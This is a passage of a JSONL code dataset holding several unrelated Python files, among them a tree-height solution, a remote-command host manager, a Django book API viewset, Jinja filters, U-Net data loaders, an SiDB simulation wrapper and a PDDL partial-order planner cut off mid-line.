Print output to STDOUT\n'''\nclass Node:\n def __init__(self,info): \n self.info = info \n self.left = None \n self.right = None \n \n\n // this is a node of the tree , which contains info as data, left , right\n'''\ndef height(root, p=0, maxim=-1):\n\n if root:\n if root.left:\n p = height(root.left, p+1, maxim)\n p -= 1\n if root.right:\n p = height(root.right, p+1, maxim)\n\n if p>maxim:\n maxim = p\n\n if not root:\n return maxim\n return p\n\n","sub_path":"scrapeHackerrankCode/codes/tree-height-of-a-binary-tree225.py","file_name":"tree-height-of-a-binary-tree225.py","file_ext":"py","file_size_in_byte":630,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"411105440","text":"#!/usr/bin/env python\n# -*- coding:utf-8 -*-\n# author:Abel\nimport json\nfrom modules.shell_modules import MyRPCShell\nfrom modules.random_modules import MyRPCMd5\n\n\nclass MyFabric(MyRPCShell,MyRPCMd5):\n\n def __init__(self, command):\n \"\"\"\n MyFabric的构造方法\n :param command: 传入命令\n \"\"\"\n self.command = command # 命令\n self.group = {} # 所有组\n self.hosts = [] # 所有用户\n with open(\"../conf/hosts.conf\",\"r\") as file:\n for line in file:\n info = line.strip()\n if info.startswith(\"[\"): # 以[开头,表示为组名\n group = info.strip(\"[]\")\n # 表示将组名作为key传入到self.group字典内,并定义他为一个列表\n self.group[group] = []\n else:\n # info数据为[ip]\n # 将info加入到self.hosts列表\n if info :\n self.hosts.append(info)\n # 将info加入到各自的组\n self.group[group].append(info)\n\n def myrpc_command(self):\n \"\"\"\n 通过用户输入的参数,来调用相应的方法\n :return:\n \"\"\"\n try:\n method_name = \"myrpc_%s\" % (self.command[1]) # 方法名\n except:\n print(\"myrpc.py: [host|group|shell|help]\") # 不存在则打印出用法\n return False\n if hasattr(self, method_name): # 通过反射寻找方法\n method = getattr(self, method_name) # 找到方法则get下来赋值\n method() # 执行方法\n else:\n print(\n \"myrpc.py: [host|group|shell|help]\") # 如果没有找到方法,则打印出用法\n return False\n\n def myrpc_host(self):\n \"\"\"\n 此方法将所有所有的主机IP和端口输出至控制台\n :return:\n \"\"\"\n print(\"ID\\tIP\")\n for host in enumerate(self.hosts):\n id = host[0]\n ip = host[1]\n print(\"%s\\t%s\" % (id, ip))\n return True\n\n def myrpc_group(self):\n \"\"\"\n 此方法将所有的组名输出至控制台\n :return:\n \"\"\"\n print(\"ID\\tName\")\n for group in enumerate(self.group):\n id = group[0]\n name = group[1]\n print(\"%s\\t%s\" % (id, name))\n return True\n\n def myrpc_help(self):\n \"\"\"\n 此方法为帮助,将所有用法输出至控制台\n :return:\n \"\"\"\n help_content=\"\"\"\n myrpc.py [host|group|shell|help]\n\n help 帮助\n\n host 列出所有主机\n\n group 列出所有组\n\n shell 执行shell命令,后面需要接--host或者--group\n 格式为:myrpc.py shell [--host=‘IP’|--group='组名'] --cmd='shell命令'\n\n\n --host [shell] --host='IP'\n\n --group [shell] --group='组名'\n\n --cmd --cmd='shell命令'\n\n \"\"\"\n print(help_content)\n\n\n\ndef run_func(cmd):\n server = MyFabric(cmd) # 定义对象,并传入参数\n server.myrpc_command() # 执行myrpc_command方法","sub_path":"day11/myrpc/service/modules/myrpc_modules.py","file_name":"myrpc_modules.py","file_ext":"py","file_size_in_byte":3231,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"71"} +{"seq_id":"35737746","text":"from simtools.Analysis.BaseAnalyzers import BaseAnalyzer\n\n\nclass SimulationDirectoryMapAnalyzer(BaseAnalyzer):\n \"\"\"\n Analyzer allowing the user to retrieve data for each experiments containing:\n | Sim ID | Tags | Path |\n\n We do not need any select_simulation_data in this analyzer as all the data we need can be\n found in the simulation objects. 
Therefore only a finalize method is used.\n \"\"\"\n\n def __init__(self):\n super().__init__(need_dir_map=True)\n\n def finalize(self, all_data: dict) -> dict:\n \"\"\"\n Will go through every key of the `all_data` parameter (the simulation objects) and construct the return\n dictionary by extracting the id, tags and physical path.\n\n Args:\n all_data: simulation -> selected data (here NONE)\n\n Returns:\n Dictionary associating experiment_id -> [{id:\"\", tag_1:\"\", tag_2:\"\", path:\"\"}, {...}]\n\n \"\"\"\n results = {}\n\n for simulation in all_data.keys():\n if simulation.experiment_id not in results:\n results[simulation.experiment_id] = []\n\n # Add the simulation to the results\n results[simulation.experiment_id].append({\n \"id\": simulation.id,\n **simulation.tags,\n \"path\": simulation.get_path()\n })\n\n return results\n\n","sub_path":"simtools/Analysis/BaseAnalyzers/SimulationDirectoryMapAnalyzer.py","file_name":"SimulationDirectoryMapAnalyzer.py","file_ext":"py","file_size_in_byte":1364,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"71"} +{"seq_id":"104285072","text":"from django.shortcuts import get_object_or_404\nfrom rest_framework import viewsets\n\nfrom rest_framework.authentication import SessionAuthentication\nfrom rest_framework.permissions import IsAuthenticated\nfrom rest_framework.response import Response\n\nfrom .serializer import BookSerializer\nfrom books.models import Book, Category, Author\nfrom django.contrib.auth import get_user_model\n\nUser = get_user_model()\n\n\nclass BookViewset(viewsets.ModelViewSet):\n # authentication_classes = [SessionAuthentication]\n # permission_classes = [IsAuthenticated] # checks auth; if OK|=> perform_create starts\n serializer_class = BookSerializer\n lookup_field = 'slug'\n queryset = Book.objects.all()\n\n # def create /perform_create: extra layer of validation ( excl duble; type or like that\n\n def create(self, request):\n \"\"\" create (basic req.data ) vs perform_create (no req.data;suitable for custom-n)\n and has serialiser\"\"\"\n data = request.data\n category_id = data.get('category_id')\n category = get_object_or_404(Category, id=category_id)\n owner_id = data.get('owner_id')\n owner = get_object_or_404(User, id=owner_id)\n price = data.get('price')\n title = data.get('title')\n desc = data.get('description')\n authors = data.get('authors') # list [{'name': 'Mulya'}]\n new_book = Book.objects.create(\n owner=owner, category=category, title=title, description=desc, price=price\n )\n list_authors = []\n for person in authors:\n for n,name_val in person.items():\n if Author.objects.filter(name=name_val).exists():\n found_author = get_object_or_404(Author,name=name_val)\n new_book.authors.add(found_author)\n else:\n new_author = Author.objects.create(name=name_val)\n new_book.authors.add(new_author)\n new_book.save()\n serializer = BookSerializer(new_book)\n return Response(serializer.data)\n\n # def perform_create(self, serializer):\n # \"\"\" create (basic req.data ) vs perform_create (no req.data;suitable for custom-n)\n # and has serialiser\"\"\"\n # req_data = self.request.data\n # #serializer.validated_data: title,descr-n,price; no trace of FK or m2m\n # data = serializer.validated_data\n # category_id = req_data.get('category_id')\n # # category_id = data.get('category_id') # here None\n # category = get_object_or_404(Category, id=category_id)\n # print(\"found cat\", category)\n # owner_id = req_data.get('owner_id')\n # owner = get_object_or_404(User, id=owner_id)\n # 
print(\"found owner\", owner)\n # author_id = req_data.get('author_id')\n # author = get_object_or_404(Author,id=author_id)\n # # serializer.save(owner=owner, category=category)\n # print(\"It's done ....\")\n\n\n\n","sub_path":"api/viewsets.py","file_name":"viewsets.py","file_ext":"py","file_size_in_byte":2922,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"71"} +{"seq_id":"285592634","text":"import jinja2, os.path\nfrom models.post import Post\n\nJINJA_ENVIRONMENT = jinja2.Environment(\n loader=jinja2.FileSystemLoader(os.path.dirname(__file__)),\n extensions=['jinja2.ext.autoescape'],\n autoescape=True)\n\ndef get_template(name):\n\treturn JINJA_ENVIRONMENT.get_template(name)\n\nimport re\nfrom jinja2 import evalcontextfilter, Markup, escape\n\n_paragraph_re = re.compile(r'(?:\\r\\n|\\r|\\n){2,}')\n\n@evalcontextfilter\ndef nl2br(eval_ctx, value):\n result = u'\\n\\n'.join(u'<p>%s</p>' % p.replace('\\n', '<br>\\n')\n for p in _paragraph_re.split(escape(value)))\n\n result = result.replace(Post.seperator, '<hr>')\n if eval_ctx.autoescape:\n result = Markup(result)\n return result\t\n\n@evalcontextfilter\ndef img2tags(eval_ctx, value):\n import re\n result = re.sub(r'\\$IMG:([0-9a-zA-Z\\.-]+)', '<a href=\"/image/\\\\1?fullsize=1\" target=\"_blank\"><img src=\"/image/\\\\1\"/></a>', value)\n\n if eval_ctx.autoescape:\n result = Markup(result)\n return result\n\n\nJINJA_ENVIRONMENT.filters['nl2br'] = nl2br \nJINJA_ENVIRONMENT.filters['img2tags'] = img2tags ","sub_path":"templates/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1101,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"71"} +{"seq_id":"373114840","text":"#\n# load.py : utils on generators / lists of ids to transform from strings to\n# cropped images and masks\n\nimport os\n\nimport numpy as np\nfrom PIL import Image\nimport cv2\nfrom Projects.FLL_flaw_detection.segmentation.Unet.utils.utils import resize_and_crop, get_square, normalize, hwc_to_chw\nfrom Projects.FLL_flaw_detection.segmentation.Unet.augmentation import augmentation\n\ndef squeeze(mask):\n if len(mask.shape) ==3:\n mask = cv2.cvtColor(mask, cv2.COLOR_BGR2GRAY)\n mask = mask.astype(np.float32)\n if np.max(mask)==255:\n mask /= 255.0\n return mask[..., np.newaxis]\n\n\ndef to_cropped_imgs(ids, dir, isize):\n \"\"\"From a list of tuples, returns the correct cropped img\"\"\"\n for id in ids:\n im = resize_and_crop(Image.open(os.path.join(dir, id)), isize=isize)\n yield im\n\n\ndef get_imgs_and_masks(ids, dir, isize=448, aug=True):\n \"\"\"Return all the couples (img, mask)\"\"\"\n\n imgs = to_cropped_imgs(ids, dir, isize)\n\n # need to transform from HWC to CHW\n if aug:\n imgs = map(augmentation, imgs)\n imgs_switched = map(hwc_to_chw, imgs)\n imgs_normalized = map(normalize, imgs_switched)\n ids_mask = [name.replace('.', '_mask.') for name in ids]\n\n masks = to_cropped_imgs(ids_mask, dir, isize)\n masks_squeezed = map(squeeze, masks)\n masks_switched = map(hwc_to_chw, masks_squeezed)\n if aug:\n gen = map(augmentwithmask, zip(imgs_normalized, masks_switched))\n else:\n gen = zip(imgs_normalized, masks_switched)\n return gen\n\n\ndef get_full_img_and_mask(id, dir_img, dir_mask):\n im = Image.open(dir_img + id + '.png')\n mask = Image.open(dir_mask + id + '.png')\n return np.array(im), np.array(mask)\n\n\ndef augmentwithmask(inputs):\n flip_code = np.random.randint(-1, 3)\n img, mask = inputs\n if flip_code != 2:\n img = cv2.flip(img, flip_code)\n mask = 
cv2.flip(mask, flip_code)\n return img, mask","sub_path":"TrainerDL/Projects/FLL_flaw_detection/segmentation/Unet/utils/load.py","file_name":"load.py","file_ext":"py","file_size_in_byte":1919,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"71"} +{"seq_id":"266006202","text":"class InputComment(object):\n def __init__(self, event_id, sample_id, construct_id, current_call,\n user, date, comment):\n self.event_id = event_id\n self.sample_id = sample_id\n self.construct_id = construct_id\n self.current_call = current_call\n self.user = user\n self.date = date\n self.comment = comment\n","sub_path":"src/model/InputComment.py","file_name":"InputComment.py","file_ext":"py","file_size_in_byte":370,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"71"} +{"seq_id":"210816089","text":"studentencijfers = [[95, 92, 86], [66, 75, 54], [89, 72, 100], [34, 0, 0]]\n\ndef gemiddelde_per_student(studentencijfers):\n\n antw = []\n\n for student in range(len(studentencijfers)):\n\n antw.append(sum(studentencijfers[student]) / len(studentencijfers[student]))\n\n return antw\n\n\ndef gemiddelde_van_alle_studenten(studentencijfers):\n\n antw = 0\n student_nummer = 0\n\n for student in range(len(studentencijfers)):\n antw += sum(studentencijfers[student]) / len(studentencijfers[student])\n student_nummer = student_nummer + 1\n\n antw = antw / student_nummer\n\n return antw\n\n\nprint(gemiddelde_per_student(studentencijfers))\n\nprint(gemiddelde_van_alle_studenten(studentencijfers))\n\n\n\n\n\n\n\n","sub_path":"opdrachten/les8/pe8_4.py","file_name":"pe8_4.py","file_ext":"py","file_size_in_byte":720,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"71"} +{"seq_id":"447589521","text":"#############################################################################\n# UFMG - 2021 #\n# SiDB GateFinder: #\n# Framework to facilitate edition and testing of SiDB circuits #\n# #\n# Authors: Arthur Fortini and Gustavo Guedes #\n# File: wrapper.py #\n# Description: Top level file to address user modifications in a base #\n# SiDB file and facilitate simulation and anaylis of results. 
#\n# Please note that some parts should be edited by user and #\n# some parts are an automated flow that should not be modified #\n# #\n#############################################################################\n\nimport argparse\nimport os\nimport xml.etree.ElementTree as ET\nimport copy\nimport math\nfrom random import seed\nfrom random import randint\nimport re\nfrom datetime import datetime\nimport sys\n\n# this imports assumes that a pysimanneal directory containing __init__.py,\n# simanneal.py, and the compiled simanneal library (_simanneal.so for Linux or\n# _simanneal.pyd for Windows) are present.\n# also a src directory containing dbMap.py, inputPermuter.py e randomizer.Py\n# should be present.\n\nsys.path.append(\"../../src/\") #include source code directory\nimport logger\nfrom pysimanneal import simanneal\nfrom dbMap import Design, DBDot\nfrom randomizer import Randomizer\nfrom inputPermuter import Permuter\n\n\nseed(1)\n\ndef create_logger ():\n build_logger = logger.Logger()\n build_logger.set_error()\n return build_logger\n\ndef arg_parser():\n parser = argparse.ArgumentParser(description='Design randomizer script.')\n parser.add_argument('design', help='Design to be randomized', type=str)\n args = parser.parse_args()\n return args\n\ndef arg_check():\n if not os.path.isfile(args.design):\n log.error(f\"Could not find design file {args.design}\")\n\nlog = create_logger()\nargs = arg_parser()\narg_check()\n\n## EDIT DESIGN BELOW THIS LINE. EXAMPLES OF CLASS METHOD'S USAGE ARE PROVIDED IN src/examples ##\n## User Parameters - those should be always provided ##\n\ndesign_name = \"OR3_NoMod\"\nsim_mu = -0.28\nnumber_of_inputs = 3 # currently gateFinder only support 2 and 3 input gates\next_potential_vector = None\n\n# Creation of design, randomizer and inputPermuter is necessary for design edition and sim automation\ndesign = Design(args.design)\nrandomizer = Randomizer(design)\ninputpermuter = Permuter(design)\n\n## Design Modifications ##\n\n# WE DONT DO ANY MODIFICATIONS IN THIS EXAMPLE SINCE WE JUST WANNA PERMUTE INPUTS TO CHECK TRUTH TABLE\n\n\n\n## PLEASE DO NOT EDIT BELOW THIS LINE. THIS PIECE OF CODE IS DESTINED TO AUTOMATICALLY ##\n## HANDLE THE MODIFIED VERSION OF DESIGN AND GENERATE THE CORRECT SIMS AND OUTPUTS ##\n\nprint(\"------- GateFinder: SiDB Circuits Design Framework -------\\n\")\nprint(\"Universidade Federal de Minas Gerais - Dpto. 
de Ciência da Computação\\n\")\nprint(\"NanoComp Lab\")\nprint(\"Developed by Arthur Fortini and Gustavo Guedes\")\nprint(\"For more info search in the proj README file for contact information\")\nprint(\"\\n\")\nprint(\"Initializing GateFinder ....\\n\")\n\nprint(\"Automatic input permutation and simulation started at: \" + str(datetime.now()) + \"\\n\")\n\n# Saves modified version of design in cwd #\nprint(\"Saving modified version of original design.....\\n\")\ndesign.overwriteDBDots()\ndesign.save(design_name + \".sqd\")\ndesign.save(design_name + \"SIM_PROBLEM.xml\")\nbase_dir = os.getcwd()\n\n# Permutes inputs #\nprint(\"Permuting inputs.....\\n\")\nif (number_of_inputs == 2):\n inputpermuter.permute2inputs(design_name)\nelif (number_of_inputs == 3):\n inputpermuter.permute3inputs(design_name)\nelse:\n log.error(f\"Number of inputs {number_of_inputs} not supported\\n\")\n\ntt_log = open(design_name + \"_truth_table.log\", \"w\") # creates log for truth table\n\nheader = [\"-----------------------------------------------------------------------------\\n\",\n \"| UFMG - 2021 |\\n\",\n \"| SiDB GateFinder: |\\n\",\n \"| Truth Table Log |\\n\",\n \"| |\\n\",\n \"| Design: \" + design_name + \" \\n\",\n \"| Description: SimAnneal results for all possible inputs of |\\n\",\n \"| modified design. |\\n\",\n \"| Developed by: Arthur Fortini & Gustavo Guedes |\\n\",\n \"-----------------------------------------------------------------------------\\n\",\n \"\\n\",\n \"Report start:\\t\" + str(datetime.now()) + \"\\n\",\n \"\\n\",\n \"-----------------------------------------------------------------------------\\n\",\n \"INPUTS\\t\\t\\t\\t\\t\\t\\tOUTPUTS\\n\",\n \"-----------------------------------------------------------------------------\\n\"]\ntt_log.writelines(header)\n\ninput_table = []\nif (number_of_inputs == 2):\n input_table.append(\"IN0 IN1\\n\")\n input_table.append(\"--------------------\\n\")\nelif (number_of_inputs == 3):\n input_table.append(\"IN0 IN1 IN2\\n\")\n input_table.append(\"--------------------\\n\")\nelse:\n log.error(f\"Number of inputs {number_of_inputs} not supported\\n\")\n\ntt_log.writelines(input_table)\n\n# run simulations for each possibility of inputs #\n\nprint(\"Running simulations.....\\n\")\n\ndef run_simAnneal(sim_dir, ext_potential_vector = None):\n directory = \"sims\"\n path = os.path.join(directory, sim_dir)\n os.chdir(path)\n design = Design(sim_dir + \".xml\")\n randomizer = Randomizer(design)\n db_pos = []\n\n for i, DBDot in enumerate(randomizer.inputs):\n (n, m, l) = DBDot.latcoord\n db_pos.append([int(n), int(m), int(l)])\n\n for i, DBDot in enumerate(randomizer.std):\n (n, m, l) = DBDot.latcoord\n db_pos.append([int(n), int(m), int(l)])\n\n for i, DBDot in enumerate(randomizer.inPerturber):\n (n, m, l) = DBDot.latcoord\n db_pos.append([int(n), int(m), int(l)])\n\n for i, DBDot in enumerate(randomizer.outPerturber):\n (n, m, l) = DBDot.latcoord\n db_pos.append([int(n), int(m), int(l)])\n\n for i, DBDot in enumerate(randomizer.outputs):\n (n, m, l) = DBDot.latcoord\n db_pos.append([int(n), int(m), int(l)])\n\n sp = simanneal.SimParams()\n sp.mu = sim_mu\n sp.set_db_locs(db_pos)\n if (ext_potential_vector != None):\n sp.set_v_ext(ext_potential_vector)\n # sp.set_v_ext(np.zeros(len(sp.db_locs)))\n sa = simanneal.SimAnneal(sp)\n sa.invokeSimAnneal()\n results = sa.suggested_gs_results()\n return results\n\ntt_result = []\n\nif (number_of_inputs == 2):\n counter = 0\n simdir = \"\"\n inputStr = \"\"\n\n for i in range(4):\n if (counter == 0):\n 
simdir = design_name + \"_00\"\n inputStr = \"0\\t\\t0\\t\\t\"\n elif (counter == 1):\n simdir = design_name + \"_01\"\n inputStr = \"0\\t\\t1\\t\\t\"\n elif (counter == 2):\n simdir = design_name + \"_10\"\n inputStr = \"1\\t\\t0\\t\\t\"\n elif (counter == 3):\n simdir = design_name + \"_11\"\n inputStr = \"1\\t\\t1\\t\\t\"\n\n if (ext_potential_vector != None):\n result = run_simAnneal(simdir, ext_potential_vector)\n else:\n result = run_simAnneal(simdir)\n\n print(\"Simulation result for \" + simdir + \".xml : \")\n print(result)\n outputStr = str(result[0])\n find_output_regex = r\"[-+\\s][0-1](?=])\"\n outputRes = re.search(find_output_regex, outputStr).group(0)\n\n if (outputRes == \" 0\"):\n tt_log.write(inputStr + \"\\t\\t0\\n\")\n tt_result.append(inputStr + \"\\t\\t0\\n\")\n elif (outputRes == \"-1\"):\n tt_log.write(inputStr + \"\\t\\t1\\n\")\n tt_result.append(inputStr + \"\\t\\t1\\n\")\n elif (outputRes == \"+1\"):\n tt_log.write(inputStr + \"\\t\\tDEGENERATE \\n\")\n tt_result.append(inputStr + \"\\t\\tDEGENERATE\\n\")\n\n counter = counter+1\n os.chdir(base_dir)\n\nelif (number_of_inputs == 3):\n counter = 0\n simdir = \"\"\n inputStr = \"\"\n\n for i in range(8):\n if (counter == 0):\n simdir = design_name + \"_000\"\n inputStr = \"0\\t\\t0\\t\\t0\\t\\t\"\n elif (counter == 1):\n simdir = design_name + \"_001\"\n inputStr = \"0\\t\\t0\\t\\t1\\t\\t\"\n elif (counter == 2):\n simdir = design_name + \"_010\"\n inputStr = \"0\\t\\t1\\t\\t0\\t\\t\"\n elif (counter == 3):\n simdir = design_name + \"_011\"\n inputStr = \"0\\t\\t1\\t\\t1\\t\\t\"\n elif (counter == 4):\n simdir = design_name + \"_100\"\n inputStr = \"1\\t\\t0\\t\\t0\\t\\t\"\n elif (counter == 5):\n simdir = design_name + \"_101\"\n inputStr = \"1\\t\\t0\\t\\t1\\t\\t\"\n elif (counter == 6):\n simdir = design_name + \"_110\"\n inputStr = \"1\\t\\t1\\t\\t0\\t\\t\"\n elif (counter == 7):\n simdir = design_name + \"_111\"\n inputStr = \"1\\t\\t1\\t\\t1\\t\\t\"\n\n if (ext_potential_vector != None):\n result = run_simAnneal(simdir, ext_potential_vector)\n else:\n result = run_simAnneal(simdir)\n\n print(\"Simulation result for \" + simdir + \".xml : \")\n print(result)\n outputStr = str(result[0])\n find_output_regex = r\"[-+\\s][0-1](?=])\"\n outputRes = re.search(find_output_regex, outputStr).group(0)\n\n if (outputRes == \" 0\"):\n tt_log.write(inputStr + \"\\t\\t0\\n\")\n tt_result.append(inputStr + \"\\t\\t0\\n\")\n elif (outputRes == \"-1\"):\n tt_log.write(inputStr + \"\\t\\t1\\n\")\n tt_result.append(inputStr + \"\\t\\t1\\n\")\n elif (outputRes == \"+1\"):\n tt_log.write(inputStr + \"\\t\\tDEGENERATE \\n\")\n tt_result.append(inputStr + \"\\t\\tDEGENERATE\\n\")\n\n counter = counter+1\n os.chdir(base_dir)\n\nprint(\"Simulation ended at:\\t\\t\" + str(datetime.now()))\nprint(\"Simulation final result:\\n\")\n\nfor i, line in enumerate(header):\n print(line)\nfor i, line in enumerate(input_table):\n print(line)\nfor i, line in enumerate(tt_result):\n print(line)\n\n\n\n","sub_path":"examples/OR3/wrapper.py","file_name":"wrapper.py","file_ext":"py","file_size_in_byte":10678,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"72"} +{"seq_id":"338284400","text":"from utils import Expr, expr\r\nfrom logic import unify\r\nimport itertools\r\nimport random\r\n\r\nclass PDDL:\r\n\r\n\tdef __init__(self, init, goals, actions):\r\n\t\tself.init = self.convert(init)\r\n\t\tself.goals = self.convert(goals)\r\n\t\tself.actions = actions\r\n\r\n\tdef convert(self, clauses):\r\n\t\tif not 
isinstance(clauses, Expr):\r\n\t\t\tclauses = expr(clauses)\r\n\t\ttry:\r\n\t\t\tclauses = conjuncts(clauses)\r\n\t\texcept AttributeError:\r\n\t\t\tclauses = clauses\r\n\t\treturn clauses\r\n\r\n\tdef goal_test(self):\r\n\t\treturn all(goal in self.init for goal in conjuncts(self.goals))\r\n\r\n\tdef act(self, action):\r\n\t\taction_name = action.op\r\n\t\targs = action.args\r\n\t\tlist_action = first(a for a in self.actions if a.name == action_name)\r\n\t\tif list_action is None:\r\n\t\t\traise Exception('Action {} not found'.format(action_name))\r\n\t\tif not list_action.check_precond(self.init, args):\r\n\t\t\traise Exception('Action {} pre-conditions not satisfied'.format(action))\r\n\t\tself.init = list_action(self.init, args).clauses\r\n\r\n\r\nclass Action:\r\n\r\n\tdef __init__(self, action, precond, effect):\r\n\t\tif isinstance(action, str):\r\n\t\t\taction = expr(action)\r\n\t\tself.name = action.op\r\n\t\tself.args = action.args\r\n\t\tself.precond = self.convert(precond)\r\n\t\tself.effect = self.convert(effect)\r\n\r\n\tdef __call__(self, kb, args):\r\n\t\treturn self.act(kb, args)\r\n\r\n\tdef __repr__(self):\r\n\t\treturn f'{self.__class__.__name__}({Expr(self.name, *self.args)})'\r\n\r\n\tdef convert(self, clauses):\r\n\t\tif isinstance(clauses, Expr):\r\n\t\t\tclauses = conjuncts(clauses)\r\n\t\t\tfor i in range(len(clauses)):\r\n\t\t\t\tif clauses[i].op == '~':\r\n\t\t\t\t\tclauses[i] = expr('Not' + str(clauses[i].args[0]))\r\n\r\n\t\telif isinstance(clauses, str):\r\n\t\t\tclauses = clauses.replace('~', 'Not')\r\n\t\t\tif len(clauses) > 0:\r\n\t\t\t\tclauses = expr(clauses)\r\n\r\n\t\t\ttry:\r\n\t\t\t\tclauses = conjuncts(clauses)\r\n\t\t\texcept AttributeError:\r\n\t\t\t\tpass\r\n\r\n\t\treturn clauses\r\n\r\n\tdef substitute(self, e, args):\r\n\t\tnew_args = list(e.args)\r\n\t\tfor num, x in enumerate(e.args):\r\n\t\t\tfor i, _ in enumerate(self.args):\r\n\t\t\t\tif self.args[i] == x:\r\n\t\t\t\t\tnew_args[num] = args[i]\r\n\t\treturn Expr(e.op, *new_args)\r\n\r\n\tdef check_precond(self, kb, args):\r\n\t\tif isinstance(kb, list):\r\n\t\t\tkb = FolKB(kb)\r\n\r\n\t\tfor clause in self.precond:\r\n\t\t\tif self.substitute(clause, args) not in kb.clauses:\r\n\t\t\t\treturn False\r\n\t\treturn True\r\n\r\n\tdef act(self, kb, args):\r\n\t\tif isinstance(kb, list):\r\n\t\t\tkb = FolKB(kb)\r\n\r\n\t\tif not self.check_precond(kb, args):\r\n\t\t\traise Exception('Action pre-conditions not satisfied')\r\n\t\tfor clause in self.effect:\r\n\t\t\tkb.tell(self.substitute(clause, args))\r\n\t\t\tif clause.op[:3] == 'Not':\r\n\t\t\t\tnew_clause = Expr(clause.op[3:], *clause.args)\r\n\r\n\t\t\t\tif kb.ask(self.substitute(new_clause, args)) is not False:\r\n\t\t\t\t\tkb.retract(self.substitute(new_clause, args))\r\n\t\t\telse:\r\n\t\t\t\tnew_clause = Expr('Not' + clause.op, *clause.args)\r\n\r\n\t\t\t\tif kb.ask(self.substitute(new_clause, args)) is not False:\r\n\t\t\t\t\tkb.retract(self.substitute(new_clause, args))\r\n\r\n\t\treturn kb\r\n\r\n\r\n# If we only represent partial order constraints on steps, then we have a partial order planner, which is also called a non-linear planner.\r\n# In this case, we specify a set of temporal constraints between pairs of steps of the form S1 < S2 meaning that step S1 comes before, but not necessarily immediately before step S2\r\n# Principle of least commitment: never making a choice unless required to do so. 
Constraint-ordering steps will be inserted only where necessary.\r\n# On the other hand, situation-space progression planners make commitments about the order of steps as they try to find a solution and therefore may make mistakes from poor guesses about the right order of steps\r\n# Plan space planning: by searching through the plan space of (partial-order) plans. Plan space planners do least commitment planning\r\n# Pseudocode\r\n'''\r\nnon-deterministic procedure PartialOrderPlanner(Gs)\r\n\tInputs\r\n\t\tGs: set of atomic propositions to achieve\r\n\tOutput:\r\n\t\tLinear plan to achieve Gs\r\n\tLocal\r\n\t\tAgenda: set of <P, A> pairs where P is an atom and A is an action\r\n\t\tActions: set of actions in the current plan\r\n\t\tConstraints: set of temporal constraints on actions\r\n\t\tCausalLinks: set of <act0, P, act1> triples\r\n\tAgenda = {<G, finish>: G E Gs}\r\n\tActions = {start, finish}\r\n\tConstraints = {start, finish}\r\n\tCausalLinks = {}\r\n\trepeat\r\n\t\tselect and remove <G, act1> from Agenda\r\n\t\teither\r\n\t\t\tchoose act0 E Actions such that act0 achieves G\r\n\t\tor\r\n\t\t\tchoose act0 E Actions such that act0 achieves G\r\n\t\t\tActions = Actions U {act0}\r\n\t\t\tConstraints = add_const(start < act0, Constraints)\r\n\t\t\tfor each CL E CausalLinks do\r\n\t\t\t\tConstraints = protect(CL, act0, Constraints)\r\n\r\n\t\t\tAgenda = Agenda U {<P, act0>: P is a precondition of act0}\r\n\r\n\t\tConstraints = add_const(act0 < act1, Constraints)\r\n\t\tCausalLinks U {<act0, G, act1>}\r\n\t\tfor each A E Actions do\r\n\t\t\tConstraints = protect(<act0, G, act1>, A, Constraints)\r\n\r\n\tuntil Agenda = {}\r\n\treturn total ordering of Actions consistent with Constraints\r\n'''\r\n# The function add_const(act0 < act1, Constraints) returns the `Constraints` formed by adding the constraint act0 < act1 to `Constraints`,\r\n# and it fails if act0 < act1 is incompatible with `Constraints`. There are many ways this function can be implemented\r\n# The function protect(<act0, G, act1>, A, Constraints) checks whether A != act0 and A != act1 and A deletes G.\r\n# If so, it returns either {A < act0} U Constraints or {act1 < A} U Constraints. 
This is a non-deterministic choice that is searched over.\r\n# Otherwise it returns Constraints\r\n\r\nclass PartialOrderPlanner:\r\n\r\n\tdef __init__(self, pddl):\r\n\t\tself.causal_links = []\r\n\t\tself.pddl = pddl\r\n\t\tself.initialize(self.pddl)\r\n\t\tself.expanded_actions = self.expand_actions()\r\n\r\n\tdef initialize(self, pddl):\r\n\t\t# create dummy actions\r\n\t\tself.start = Action('Start', [], pddl.init)\r\n\t\tself.finish = Action('Finish', pddl.goals, [])\r\n\t\tself.actions = set()\r\n\t\tself.actions.add(self.start)\r\n\t\tself.actions.add(self.finish)\r\n\t\tself.constraints = set()\r\n\t\tself.constraints.add((self.start, self.finish))\r\n\t\tself.agenda = set()\r\n\t\tfor precond in self.finish.precond:\r\n\t\t\tself.agenda.add((precond, self.finish))\r\n\r\n\tdef expand_actions(self, name=None):\r\n\t\tobjects = set(arg for clause in self.pddl.init for arg in clause.args)\r\n\t\texpansions = []\r\n\t\taction_list = []\r\n\t\tif name is not None:\r\n\t\t\tfor action in self.pddl.actions:\r\n\t\t\t\tif str(action.name) == name:\r\n\t\t\t\t\taction_list.append(action)\r\n\t\telse:\r\n\t\t\taction_list = self.pddl.actions\r\n\r\n\t\tfor action in action_list:\r\n\t\t\tfor permutation in itertools.permutations(objects, len(action.args)):\r\n\t\t\t\tbindings = unify(Expr(action.name, *action.args), Expr(action.name, *permutation))\r\n\t\t\t\tif bindings is not None:\r\n\t\t\t\t\tnew_args = []\r\n\t\t\t\t\tfor arg in action.args:\r\n\t\t\t\t\t\tif arg in bindings:\r\n\t\t\t\t\t\t\tnew_args.append(bindings[arg])\r\n\t\t\t\t\t\telse:\r\n\t\t\t\t\t\t\tnew_args.append(arg)\r\n\t\t\t\t\tnew_expr = Expr(str(action.name), *new_args)\r\n\t\t\t\t\tnew_preconds = []\r\n\t\t\t\t\tfor precond in action.precond:\r\n\t\t\t\t\t\tnew_precond_args = []\r\n\t\t\t\t\t\tfor arg in precond.args:\r\n\t\t\t\t\t\t\tif arg in bindings:\r\n\t\t\t\t\t\t\t\tnew_precond_args.append(bindings[arg])\r\n\t\t\t\t\t\t\telse:\r\n\t\t\t\t\t\t\t\tnew_precond_args.append(arg)\r\n\t\t\t\t\t\tnew_precond = Expr(str(precond.op), 